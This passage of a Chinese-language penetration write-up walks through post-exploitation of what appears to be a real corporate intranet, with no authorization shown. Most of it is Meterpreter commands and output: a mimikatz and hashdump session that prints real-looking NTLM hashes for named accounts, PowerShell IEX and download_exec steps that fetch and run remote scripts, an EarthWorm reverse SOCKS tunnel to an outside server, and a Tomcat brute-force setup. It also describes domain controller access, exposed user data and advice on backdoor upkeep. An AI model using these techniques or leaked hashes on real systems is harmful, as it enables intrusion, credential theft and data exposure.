neuadmin:1005:aad3b435b51404eeaad3b435b51404ee:345b3b0faf52aea5200da1cf8d1323a0:::
allen:1007:aad3b435b51404eeaad3b435b51404ee:53a6281e41664275dfbccd4d171e406f:::
[*] Setting Execution policy back to Restricted...
[*] Cleaning up after ourselves...

load mimikatz kerberos

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
meterpreter > load mimikatz 
Loading extension mimikatz...
[!] Loaded x86 Mimikatz on an x64 architecture.
Success.
meterpreter > kerberos 
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID      Package    Domain        User           Password
------      -------    ------        ----           --------
******      *******    ******        ****           ********

run post/windows/gather/smart_hashdump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against ZXKF3
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /Users/liyingzhe/.msf4/loot/20171228143129_default_10.159.191.178_windows.hashes_440460.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] 	Obtaining the boot key...
[*] 	Calculating the hboot key using SYSKEY 699b2df6ee97132bcad5b2f9efdc738e...
[*] 	Obtaining the user list and keys...
[*] 	Decrypting user keys...
[*] 	Dumping password hints...
[*] 	No users with password hints on this system
[*] 	Dumping password hashes...
[+] 	Administrator:500:aad3b435b51404eeaad3b435b51404ee:a4b09576473b6a35e456ed407a98e334:::
[+] 	ftpuser:1000:aad3b435b51404eeaad3b435b51404ee:2280c4ddb554cdcdc62c72c291f2810a:::
[+] 	patrol:1002:aad3b435b51404eeaad3b435b51404ee:ce7878ab2d769fda7de045a3622a62ea:::
[+] 	neuadmin:1005:aad3b435b51404eeaad3b435b51404ee:345b3b0faf52aea5200da1cf8d1323a0:::

0x06 PowerShell技巧

外部Powershell脚本

Powersploit https://github.com/PowerShellMafia/PowerSploit

第一种办法(推荐):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > whoami
nt authority\system
PS > IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1");
PS > Invoke-Portscan -Hosts 10.159.63.2 -Ports "21"


Hostname      : 10.159.63.2
alive         : True
openPorts     : {21}
closedPorts   : {}
filteredPorts : {}
finishTime    : 2017/12/28 17:19:46

.....

第二种办法:(先通过其他模块下载)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
meterpreter > run post/windows/manage/download_exec URL=https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1

[*] 41534 bytes downloaded to C:\Windows\TEMP\Invoke-Portscan.ps1 in 1 seconds 
meterpreter > powershell_shell 
PS > C:\Windows\TEMP\Invoke-Portscan.ps1
PS > Invoke-Portscan -Hosts 10.159.63.5 -Ports "22"


Hostname      : 10.159.63.5
alive         : True
openPorts     : {22}
closedPorts   : {}
filteredPorts : {}
finishTime    : 2017/12/28 17:23:45

0x07 再一次克服困难

之前的方案是使用Portfwd,但是效果太差了,当数据流过大,会将Meterpreter冲掉,并且每次数据回送都不完整。

这次采用Socks5打洞,我利用了外网的服务器,开设一个Socks代理端口,将流量转发到目标内网

外网服务器:

1
root@iZm5e***1ga7bq07Z:~# ./ew_for_linux64 -s rcsocks -l 1080 -e 888 &

内网主机:

1
ew_for_Win.exe -s rssocks -d [服务器IP] -e 888

ew下载地址: http://rootkiter.com/EarthWorm/

现在在浏览器中设置一下Socks5代理即可访问内网,很稳定

设置代理

打洞成功

0x08 开始扫描

一开始我使用PowerSploit扫描,但是需要等待Meterpreter将数据取回,这样就占用了一个session,搜集了部分信息后,决定采用Nmap

由于我的操作系统是黑苹果,需要安装proxychains-ng

1
brew install proxychains-ng

程序安装在:/usr/local/Cellar/proxychains-ng/4.12_1/bin/proxychains4

配置文件:/usr/local/etc/proxychains.conf

添加一条Socks5代理:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
#Examples:
#
#       socks5  192.168.67.78   1080    lamer   secret
#       http    192.168.89.3    8080    justu   hidden
#       socks4  192.168.1.49    1080
#       http    192.168.39.93   8080  
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  ***.***.***.*** 1080

开始扫描:

扫描

0x09 信息搜集基本结果

通过端口扫描以及HTTP服务的爬行,发现一些运维人员开放的共享,和一些MS17010漏洞的Windows服务器,但是没有选择直接去打,觉得信息搜集的不够全面

在内网中收获最大的就是搜集到了运维人员用于共享系统镜像、工具的Web服务器:

运维人员的服务器

发现基线检查的文档,下载了一两个,开始通过搜集的信息进行内网结构画像:

基线检查

内网结构

轻松获得域控服务器

域控

从文档中搜集信息如下:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
密码:*****@*****! *****

administrator密码:***** # 后面尝试了登录这个,不行
IP地址:10.159.16.2
掩码:255.255.255.128
网关:10.159.16.1
域名称:*****.com
域用户:***** 、 *****密码*****

计算机名:
所在域名或工作组名称:*****.com
IP地址:10.159.16.2
掩码:255.255.255.128
网关:10.159.16.1
操作系统:Windows Server2008 R2企业版
服务器1—群集节点A
计算机名:nascluster1
所在域名或工作组名称:*****.com
IP地址1:10.159.16.3
IP地址2:192.168.10.3
操作系统:Windows Server 2012
服务器2—群集节点B
计算机名:nascluster2
所在域名或工作组名称:*****.com
IP地址1:10.159.16.4
IP地址2:192.168.10.4
操作系统:Windows Server 2012

根据之前搜集的子网来判断,我们所处于的内网中有很多域。并且能够可以和域控服务器通信,即使当前的服务器不在域中,也可以进行登录

域控3389

通过两层转发,我们尝试登录:

  • 一层是公司路由
  • 一层是LCX

登录域控

当时登录上去并没有做过多的操作,简单看看就下来了,因为这个内网很大,后面的发现令我倒吸凉气

0x10 内网核心

Orion

这是一款完善的网络带宽、性能和故障管理软件。使用它用户可以通过自己的浏览器即时监控自己的网络状态和统计资料。程序将监视和搜集来自路由、节点、服务器和所有开启SNMP服务的设备信息;同时也将监控本机的CPU占用率、内存使用情况以及可用磁盘空间。

Orion

通过空口令进入

Orion

通过查看别名发现这些设备是企业的核心路由、防火墙、交换机

  • 官网防火墙
  • 管理员交换机(专线)
  • 内网核心交换机 x 2
  • 外网核心交换机 x 2
  • 公网接入交换机 x 2
  • 回源 (这个不太清楚)

基本上都是50个口以上

通过之前的自动搜集的路由来看:

1
2
3
4
5
6
7
[*] AutoAddRoute: Routing new subnet 10.0.0.0/255.0.0.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.0.0/255.255.128.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.63.128/255.255.255.128 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.128.0/255.255.128.0 through session 9
[*] AutoAddRoute: Routing new subnet 10.159.191.128/255.255.255.128 through session 9
[*] AutoAddRoute: Routing new subnet 169.254.0.0/255.255.0.0 through session 9
[*] AutoAddRoute: Routing new subnet 192.168.0.0/255.255.0.0 through session 9

10.0.0.0 是可以访问整个超大的内网,在搜集其他网段信息的时候,不泛发现其他大企业的漏洞、大多是配置不得当。

0x12 配置引发的隐患

一些配置文件

一些配置文件

还有未做权限验证的Docker集群管理平台:

Docker

有多个实例,分别用于对外的服务

搜集到用户中心的数据库配置,也就是说泄漏了所有用户的数据了,这可是一个大厂。

数据库

其次一些网段基本上都安装了tomcat,通过socks5代理,进行爆破,流量不走Meterpreter,因为会掉线

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf auxiliary(tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                              Required  Description
   ----              ---------------                                                                              --------  -----------
   BLANK_PASSWORDS   false                                                                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                                            yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                                        no        Add all users in the current database to the list
   PASSWORD                                                                                                       no        The HTTP password to specify for authentication
   PASS_FILE         /Volumes/OSXData/Pentester/Dict/100.txt                                                      no        File containing passwords, one per line
   Proxies           socks5:***.***.***.***:1080                                                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            10.159.63.70-133                                                                             yes       The target address range or CIDR identifier
   RPORT             8080                                                                                         yes       The target port (TCP)
   SSL               false                                                                                        no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                                        yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                                yes       URI for Manager login. Default is /manager/html
   THREADS           10                                                                                           yes       The number of concurrent threads
   USERNAME                                                                                                       no        The HTTP username to specify for authentication
   USERPASS_FILE     /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                                        no        Try the username as the password for all users
   USER_FILE         /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                                         yes       Whether to print output for all attempts
   VHOST                                                                                                          no        HTTP server virtual host

tomcat爆破

如我所料,没有一个成功的,也发现了一些SSH端口,但是会把流量升高,触发一些警报,就没有再尝试这种爆破手法了。

0x13 需要搜集的信息

搜集的信息列出来,就不贴了:

  • 服务器当前所在网段的所有主机端口
  • 服务器ARP缓存
  • 服务器上的服务
  • 内网中其他HTTP服务
  • 满足容易利用的漏洞端口 (MS17010 / 445)
  • 抓包嗅探还是很有必要的 (千万不要ARP %@#@@651#@^#@@#@@###@@!)
  • 共享文件
  • 密码

0x14 总结

  • 在行动之前思考几分钟,有没有更好的办法
  • 思考一个问题多个解决方案的利弊
  • 尽量快速熟悉网络环境 -> [前提是你已经熟悉了服务器环境]
  • 对日志要时刻保持敏感
  • 看子网掩码、计算子网大小,判断有没有VLAN
  • 选取自己熟悉的协议进行信息搜集
  • 网络命令一定要熟
  • 对于后门要加强维护
  • 你必须保证你花费98%的时间都在了解他们
  • 学习使用Powershell和熟练掌握端口转发